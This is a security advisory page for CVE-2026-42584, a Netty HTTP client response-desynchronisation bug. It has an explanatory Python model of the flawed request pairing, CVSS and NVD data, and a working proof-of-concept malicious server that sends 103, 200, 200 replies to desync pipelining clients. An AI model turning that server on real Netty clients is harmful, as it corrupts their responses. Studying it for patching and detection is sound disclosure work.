Security Vulnerability Report

CVE-2026-42584 (CVSS 7.3 HIGH)

Published: 2026-05-13 19:17:24
Last Modified: 2026-05-14 16:26:50

Description

Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpClientCodec pairs each inbound response with an outbound request by queue.poll() once per response, including for 1xx. If the client pipelines GET then HEAD and the server sends 103, then 200 with GET body, then 200 for HEAD, the queue pairs HEAD with the first 200. The HEAD rule then skips reading that message’s body, so the GET entity bytes stay on the stream and the following 200 is parsed from the wrong offset. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.
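The pairing mistake described above is easiest to see in a small model of the decoder. The following Python is an added example written for this page; it is not Netty's code and does not call Netty's API. It models HttpClientCodec's request queue against a constructed byte stream carrying exactly the three responses the description lists (103, then 200 with the GET entity, then 200 for HEAD). With `poll_on_informational=True` the model reproduces the vulnerable behaviour: the 103 consumes GET, the first 200 is paired with HEAD, its body is skipped, and the next status line is read from inside "Hello, World!". With `poll_on_informational=False` (the assumed shape of the fix: an interim 1xx response, other than 101, does not consume a request) every response is paired correctly. The treatment of 101 as a final response is an assumption of the model, not a statement about Netty's patch.

```python
from collections import deque

# Constructed stream reproducing the sequence in the advisory description:
# 103 (no body), 200 with the GET entity, 200 for HEAD (no body).
SAMPLE_STREAM = (
    b"HTTP/1.1 103 Early Hints\r\nLink: </style.css>; rel=preload; as=style\r\n\r\n"
    b"HTTP/1.1 200 OK\r\nContent-Length: 13\r\n\r\nHello, World!"
    b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"
)


class DesyncError(Exception):
    """Raised when the parser finds something other than a status line."""


def _parse_head(stream, pos):
    """Parse a status line and headers starting at pos.

    Returns (status, headers, body_start). Raises DesyncError when the bytes
    at pos are not a status line, which is exactly what happens once a body
    has been left unread on the stream.
    """
    end = stream.find(b"\r\n\r\n", pos)
    if end < 0:
        raise DesyncError("incomplete header block at offset %d" % pos)
    lines = stream[pos:end].decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/1.") or not parts[1].isdigit():
        raise DesyncError(
            "garbage where a status line was expected at offset %d: %r" % (pos, lines[0])
        )
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(parts[1]), headers, end + 4


def pair_responses(stream, pipelined_methods, poll_on_informational):
    """Model of HttpClientCodec's request/response pairing (not Netty's code).

    poll_on_informational=True reproduces the vulnerable behaviour (one poll
    per response, 1xx included); False models the fix (an interim response
    does not consume a request from the queue).
    """
    queue = deque(pipelined_methods)
    pos = 0
    paired = []
    while pos < len(stream):
        status, headers, body_start = _parse_head(stream, pos)
        # 101 Switching Protocols is treated as final here (model assumption).
        informational = 100 <= status < 200 and status != 101
        if informational and not poll_on_informational:
            method = queue[0] if queue else None  # peek: the final response is still owed
        else:
            method = queue.popleft() if queue else None
        # Body rules: 1xx/204/304 never carry a body; a HEAD response may declare
        # a Content-Length but carries no entity bytes.
        if informational or status in (204, 304) or method == "HEAD":
            body = b""
            pos = body_start
        else:
            length = int(headers.get("content-length", "0"))
            body = stream[body_start:body_start + length]
            pos = body_start + length
        paired.append((status, method, body))
    return paired


def demonstrate(stream=SAMPLE_STREAM, methods=("GET", "HEAD")):
    """Run both pairing modes; returns (fixed_result, vulnerable_error_or_None)."""
    fixed = pair_responses(stream, methods, poll_on_informational=False)
    try:
        pair_responses(stream, methods, poll_on_informational=True)
        vuln_error = None
    except DesyncError as exc:
        vuln_error = str(exc)
    return fixed, vuln_error


if __name__ == "__main__":
    fixed, vuln_error = demonstrate()
    for status, method, body in fixed:
        print("fixed pairing:      %d <- %s body=%r" % (status, method, body))
    print("vulnerable pairing: %s" % vuln_error)
```

The vulnerable path does not fail at the mispaired 200; it fails one message later, when the leftover entity bytes are read as the next status line. That is the signature a defender should expect from this bug class (CWE-444): a client that reports a malformed response, or silently attributes one response's body to another request, only after an interim 1xx appeared on a pipelined connection.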

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

Netty < 4.1.133.Final
Netty < 4.2.13.Final

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import socket
import time

# Malicious server to trigger CVE-2026-42584
# Exploit condition: client pipelines GET then HEAD, server sends 103 -> 200 -> 200


def start_exploit_server():
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_socket.bind(('0.0.0.0', 8080))
    server_socket.listen(1)
    print("[+] Malicious server listening on port 8080...")

    client_socket, addr = server_socket.accept()
    print(f"[+] Connection from {addr}")

    # Receive the pipelined requests (GET followed by HEAD)
    request_data = client_socket.recv(4096).decode('utf-8')
    print("[+] Received pipelined requests:")
    print(request_data)

    # Step 1: send 103 Early Hints (1xx response).
    # This causes the vulnerable client to poll the queue for the first time (associating GET).
    print("[+] Sending 103 Early Hints...")
    response_103 = "HTTP/1.1 103 Early Hints\r\nLink: </style.css>; rel=preload; as=style\r\n\r\n"
    client_socket.sendall(response_103.encode('utf-8'))
    time.sleep(0.5)

    # Step 2: send 200 OK with a body.
    # The client polls the queue again (getting HEAD) and pairs it with this body.
    # The HEAD handler will skip the body, leaving bytes on the stream.
    print("[+] Sending 200 OK with body (intended for GET but paired with HEAD)...")
    response_body = "HTTP/1.1 200 OK\r\nContent-Length: 13\r\n\r\nHello, World!"
    client_socket.sendall(response_body.encode('utf-8'))
    time.sleep(0.5)

    # Step 3: send 200 OK for the HEAD request.
    # The client is now desynchronized and will parse this from the wrong offset.
    print("[+] Sending final 200 OK...")
    response_final = "HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"
    client_socket.sendall(response_final.encode('utf-8'))

    client_socket.close()
    server_socket.close()
    print("[+] Exploit finished.")


if __name__ == "__main__":
    start_exploit_server()

References

https://github.com/netty/netty/security/advisories/GHSA-57rv-r2g8-2cj3 (GitHub Security Advisory; weakness CWE-444)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-42584",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-13T19:17:24.043",
    "lastModified": "2026-05-14T16:26:50.047",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpClientCodec pairs each inbound response with an outbound request by queue.poll() once per response, including for 1xx. If the client pipelines GET then HEAD and the server sends 103, then 200 with GET body, then 200 for HEAD, the queue pairs HEAD with the first 200. The HEAD rule then skips reading that message’s body, so the GET entity bytes stay on the stream and the following 200 is parsed from the wrong offset. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-444"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/netty/netty/security/advisories/GHSA-57rv-r2g8-2cj3",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/netty/netty/security/advisories/GHSA-57rv-r2g8-2cj3",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}